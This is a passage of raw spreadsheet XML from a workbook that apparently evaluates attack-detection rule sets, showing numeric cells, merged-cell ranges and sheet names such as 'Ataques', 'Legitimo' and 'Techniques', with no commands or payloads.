      <c r="LM3" s="179" t="s">
        <v>4298</v>
      </c>
      <c r="LN3" s="179">
        <v>13</v>
      </c>
      <c r="LO3" s="179">
        <v>352503</v>
      </c>
      <c r="LP3" s="177">
        <v>2911434</v>
      </c>
      <c r="LQ3" s="178">
        <v>2911434</v>
      </c>
      <c r="LR3" s="506">
        <v>2911434</v>
      </c>
      <c r="LS3" s="179" t="s">
        <v>4299</v>
      </c>
      <c r="LT3" s="179">
        <v>18</v>
      </c>
      <c r="LU3" s="179">
        <v>2910830</v>
      </c>
      <c r="LV3" s="177">
        <v>4019369</v>
      </c>
      <c r="LW3" s="178">
        <v>4019369</v>
      </c>
      <c r="LX3" s="506">
        <v>4019369</v>
      </c>
      <c r="LY3" s="179" t="s">
        <v>4300</v>
      </c>
      <c r="LZ3" s="179">
        <v>3</v>
      </c>
      <c r="MA3" s="179">
        <v>4019369</v>
      </c>
      <c r="MB3" s="177">
        <v>14181987</v>
      </c>
      <c r="MC3" s="178">
        <v>14181987</v>
      </c>
      <c r="MD3" s="506">
        <v>13968926</v>
      </c>
      <c r="ME3" s="179" t="s">
        <v>4301</v>
      </c>
      <c r="MF3" s="179">
        <v>100</v>
      </c>
      <c r="MG3" s="179">
        <v>13159176</v>
      </c>
      <c r="MH3" s="180">
        <v>31273</v>
      </c>
      <c r="MI3" s="180">
        <v>56932</v>
      </c>
      <c r="MJ3" s="181">
        <v>14</v>
      </c>
      <c r="MK3" s="181">
        <v>14</v>
      </c>
      <c r="ML3" s="181">
        <v>28174</v>
      </c>
      <c r="MM3" s="181">
        <v>28174</v>
      </c>
      <c r="MN3" s="181">
        <v>28174</v>
      </c>
      <c r="MO3" s="181">
        <v>28174</v>
      </c>
      <c r="MP3" s="377"/>
      <c r="MQ3" s="180">
        <v>7079</v>
      </c>
      <c r="MR3" s="181">
        <v>7079</v>
      </c>
      <c r="MS3" s="181">
        <v>6681</v>
      </c>
      <c r="MT3" s="181" t="s">
        <v>4740</v>
      </c>
      <c r="MU3" s="181">
        <v>9</v>
      </c>
      <c r="MV3" s="463">
        <v>6661</v>
      </c>
      <c r="MW3" s="180">
        <v>12</v>
      </c>
      <c r="MX3" s="181">
        <v>12</v>
      </c>
      <c r="MY3" s="181">
        <v>12</v>
      </c>
      <c r="MZ3" s="181" t="s">
        <v>957</v>
      </c>
      <c r="NA3" s="181">
        <v>1</v>
      </c>
      <c r="NB3" s="463">
        <v>12</v>
      </c>
      <c r="NC3" s="180">
        <v>24154</v>
      </c>
      <c r="ND3" s="181">
        <v>24154</v>
      </c>
      <c r="NE3" s="181">
        <v>21969</v>
      </c>
      <c r="NF3" s="181" t="s">
        <v>4302</v>
      </c>
      <c r="NG3" s="181">
        <v>4</v>
      </c>
      <c r="NH3" s="463">
        <v>21955</v>
      </c>
      <c r="NI3" s="180">
        <v>1</v>
      </c>
      <c r="NJ3" s="181">
        <v>1</v>
      </c>
      <c r="NK3" s="181">
        <v>1</v>
      </c>
      <c r="NL3" s="181" t="s">
        <v>4303</v>
      </c>
      <c r="NM3" s="181">
        <v>1</v>
      </c>
      <c r="NN3" s="463">
        <v>1</v>
      </c>
      <c r="NO3" s="180">
        <v>27</v>
      </c>
      <c r="NP3" s="181">
        <v>27</v>
      </c>
      <c r="NQ3" s="181">
        <v>27</v>
      </c>
      <c r="NR3" s="181" t="s">
        <v>4304</v>
      </c>
      <c r="NS3" s="181">
        <v>1</v>
      </c>
      <c r="NT3" s="463">
        <v>27</v>
      </c>
      <c r="NU3" s="180">
        <v>529</v>
      </c>
      <c r="NV3" s="181">
        <v>529</v>
      </c>
      <c r="NW3" s="181">
        <v>508</v>
      </c>
      <c r="NX3" s="181" t="s">
        <v>4447</v>
      </c>
      <c r="NY3" s="181">
        <v>5</v>
      </c>
      <c r="NZ3" s="463">
        <v>508</v>
      </c>
      <c r="OA3" s="180">
        <v>1366</v>
      </c>
      <c r="OB3" s="181">
        <v>1366</v>
      </c>
      <c r="OC3" s="181">
        <v>1355</v>
      </c>
      <c r="OD3" s="181" t="s">
        <v>4448</v>
      </c>
      <c r="OE3" s="181">
        <v>3</v>
      </c>
      <c r="OF3" s="463">
        <v>1355</v>
      </c>
      <c r="OG3" s="180">
        <v>1715</v>
      </c>
      <c r="OH3" s="181">
        <v>1715</v>
      </c>
      <c r="OI3" s="181">
        <v>1713</v>
      </c>
      <c r="OJ3" s="181" t="s">
        <v>4449</v>
      </c>
      <c r="OK3" s="181">
        <v>4</v>
      </c>
      <c r="OL3" s="463">
        <v>1712</v>
      </c>
      <c r="OM3" s="180">
        <v>27663</v>
      </c>
      <c r="ON3" s="181">
        <v>27663</v>
      </c>
      <c r="OO3" s="181">
        <v>24666</v>
      </c>
      <c r="OP3" s="181" t="s">
        <v>4450</v>
      </c>
      <c r="OQ3" s="181">
        <v>2</v>
      </c>
      <c r="OR3" s="463">
        <v>24666</v>
      </c>
      <c r="OS3" s="180">
        <v>0</v>
      </c>
      <c r="OT3" s="181">
        <v>0</v>
      </c>
      <c r="OU3" s="181">
        <v>0</v>
      </c>
      <c r="OV3" s="181">
        <v>0</v>
      </c>
      <c r="OW3" s="181">
        <v>0</v>
      </c>
      <c r="OX3" s="463">
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:414" ht="15.75" customHeight="1">
      <c r="JT4" s="2"/>
      <c r="JU4" s="2"/>
      <c r="JV4" s="2"/>
      <c r="JW4" s="2"/>
      <c r="KE4" s="2"/>
      <c r="KK4" s="2"/>
      <c r="KQ4" s="2"/>
      <c r="KW4" s="2"/>
      <c r="LC4" s="2"/>
      <c r="LI4" s="2"/>
      <c r="LO4" s="2"/>
      <c r="LU4" s="2"/>
      <c r="MA4" s="2"/>
      <c r="MG4" s="2"/>
      <c r="MT4" s="2"/>
      <c r="MU4" s="2"/>
      <c r="MZ4" s="2"/>
      <c r="NA4" s="2"/>
      <c r="NF4" s="2"/>
      <c r="NG4" s="2"/>
      <c r="NL4" s="2"/>
      <c r="NM4" s="2"/>
      <c r="NR4" s="2"/>
      <c r="NS4" s="2"/>
      <c r="NX4" s="2"/>
      <c r="NY4" s="2"/>
      <c r="OD4" s="2"/>
      <c r="OE4" s="2"/>
      <c r="OJ4" s="2"/>
      <c r="OK4" s="2"/>
      <c r="OP4" s="2"/>
      <c r="OQ4" s="2"/>
      <c r="OV4" s="2"/>
      <c r="OW4" s="2"/>
    </row>
    <row r="5" spans="1:414" ht="15.75" customHeight="1">
      <c r="A5" s="10" t="s">
        <v>2447</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="68">
    <mergeCell ref="BI1:BN1"/>
    <mergeCell ref="BO1:BT1"/>
    <mergeCell ref="BU1:BZ1"/>
    <mergeCell ref="AE1:AJ1"/>
    <mergeCell ref="AK1:AP1"/>
    <mergeCell ref="AQ1:AV1"/>
    <mergeCell ref="AW1:BB1"/>
    <mergeCell ref="BC1:BH1"/>
    <mergeCell ref="A1:F1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:R1"/>
    <mergeCell ref="S1:X1"/>
    <mergeCell ref="Y1:AD1"/>
    <mergeCell ref="CA1:CF1"/>
    <mergeCell ref="CG1:CL1"/>
    <mergeCell ref="CM1:CR1"/>
    <mergeCell ref="CS1:CX1"/>
    <mergeCell ref="CY1:DD1"/>
    <mergeCell ref="DE1:DJ1"/>
    <mergeCell ref="DK1:DP1"/>
    <mergeCell ref="DQ1:DV1"/>
    <mergeCell ref="DW1:EB1"/>
    <mergeCell ref="EC1:EH1"/>
    <mergeCell ref="EI1:EN1"/>
    <mergeCell ref="EO1:ET1"/>
    <mergeCell ref="EU1:EZ1"/>
    <mergeCell ref="FA1:FF1"/>
    <mergeCell ref="FG1:FL1"/>
    <mergeCell ref="FM1:FR1"/>
    <mergeCell ref="FS1:FX1"/>
    <mergeCell ref="FY1:GD1"/>
    <mergeCell ref="GE1:GJ1"/>
    <mergeCell ref="GK1:GP1"/>
    <mergeCell ref="GQ1:GV1"/>
    <mergeCell ref="GW1:HB1"/>
    <mergeCell ref="HC1:HH1"/>
    <mergeCell ref="HI1:HN1"/>
    <mergeCell ref="HO1:HT1"/>
    <mergeCell ref="HU1:HZ1"/>
    <mergeCell ref="IA1:IF1"/>
    <mergeCell ref="IG1:IL1"/>
    <mergeCell ref="IM1:IR1"/>
    <mergeCell ref="IS1:IX1"/>
    <mergeCell ref="IY1:JD1"/>
    <mergeCell ref="JE1:JJ1"/>
    <mergeCell ref="JK1:JP1"/>
    <mergeCell ref="JQ1:JY1"/>
    <mergeCell ref="JZ1:KE1"/>
    <mergeCell ref="KF1:KK1"/>
    <mergeCell ref="KL1:KQ1"/>
    <mergeCell ref="KR1:KW1"/>
    <mergeCell ref="KX1:LC1"/>
    <mergeCell ref="LD1:LI1"/>
    <mergeCell ref="LJ1:LO1"/>
    <mergeCell ref="LP1:LU1"/>
    <mergeCell ref="LV1:MA1"/>
    <mergeCell ref="MB1:MG1"/>
    <mergeCell ref="MH1:MP1"/>
    <mergeCell ref="MQ1:MV1"/>
    <mergeCell ref="MW1:NB1"/>
    <mergeCell ref="NC1:NH1"/>
    <mergeCell ref="NI1:NN1"/>
    <mergeCell ref="NO1:NT1"/>
    <mergeCell ref="NU1:NZ1"/>
    <mergeCell ref="OA1:OF1"/>
    <mergeCell ref="OG1:OL1"/>
    <mergeCell ref="OM1:OR1"/>
    <mergeCell ref="OS1:OX1"/>
  </mergeCells>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait"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16</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="38" baseType="lpstr">
      <vt:lpstr>RuleSets</vt:lpstr>
      <vt:lpstr>Tabla 3 (Legítimo)</vt:lpstr>
      <vt:lpstr>T2 (At) S&lt;=4, FG&gt;=1</vt:lpstr>
      <vt:lpstr>T4 (Rend) S&lt;=4, FG&gt;=1</vt:lpstr>
      <vt:lpstr>T5 (Pru) S&lt;=4,FG&gt;=1</vt:lpstr>
      <vt:lpstr>T2 (At) S&lt;=3, FG&gt;=2</vt:lpstr>
      <vt:lpstr>T4 (Rend) S&lt;=3, FG&gt;=2</vt:lpstr>
      <vt:lpstr>T5 (Pru) S&lt;=3,FG&gt;=2</vt:lpstr>
      <vt:lpstr>T2 (At) S&lt;=2, FG&gt;=3</vt:lpstr>
      <vt:lpstr>T4 (Rend) S&lt;=2, FG&gt;=3</vt:lpstr>
      <vt:lpstr>T5 (Pru) S&lt;=2,FG&gt;=3</vt:lpstr>
      <vt:lpstr>T2 (At) S&lt;=1, FG&gt;=4</vt:lpstr>
      <vt:lpstr>T4 (Rend) S&lt;=1, FG&gt;=4</vt:lpstr>
      <vt:lpstr>T5 (Pru) S&lt;=1,FG&gt;=4</vt:lpstr>
      <vt:lpstr>T2 (At) FG&gt;=5</vt:lpstr>
      <vt:lpstr>T4 (Rend) FG&gt;=5</vt:lpstr>
      <vt:lpstr>T5 (Pru) FG&gt;=5</vt:lpstr>
      <vt:lpstr>Separador</vt:lpstr>
      <vt:lpstr>Tabla 2 - Ataques detec (Imple)</vt:lpstr>
      <vt:lpstr>Techniques</vt:lpstr>
      <vt:lpstr>(A) Ataques</vt:lpstr>
      <vt:lpstr>(B) Legitimo</vt:lpstr>
      <vt:lpstr>'T2 (At) FG&gt;=5'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T2 (At) S&lt;=1, FG&gt;=4'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T2 (At) S&lt;=2, FG&gt;=3'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T2 (At) S&lt;=3, FG&gt;=2'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T2 (At) S&lt;=4, FG&gt;=1'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T4 (Rend) FG&gt;=5'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T4 (Rend) S&lt;=1, FG&gt;=4'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T4 (Rend) S&lt;=2, FG&gt;=3'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T4 (Rend) S&lt;=3, FG&gt;=2'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T4 (Rend) S&lt;=4, FG&gt;=1'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T5 (Pru) FG&gt;=5'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T5 (Pru) S&lt;=1,FG&gt;=4'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T5 (Pru) S&lt;=2,FG&gt;=3'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T5 (Pru) S&lt;=3,FG&gt;=2'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'T5 (Pru) S&lt;=4,FG&gt;=1'!Área_de_impresión</vt:lpstr>
      <vt:lpstr>'Tabla 2 - Ataques detec (Imple)'!Área_de_impresión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IGNACIO MERCHAN CAMARA</cp:lastModifiedBy>
  <cp:lastPrinted>2026-06-25T19:48:03Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-04T16:51:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-13T19:56:41Z</dcterms:modified>
</cp:coreProperties>
</file>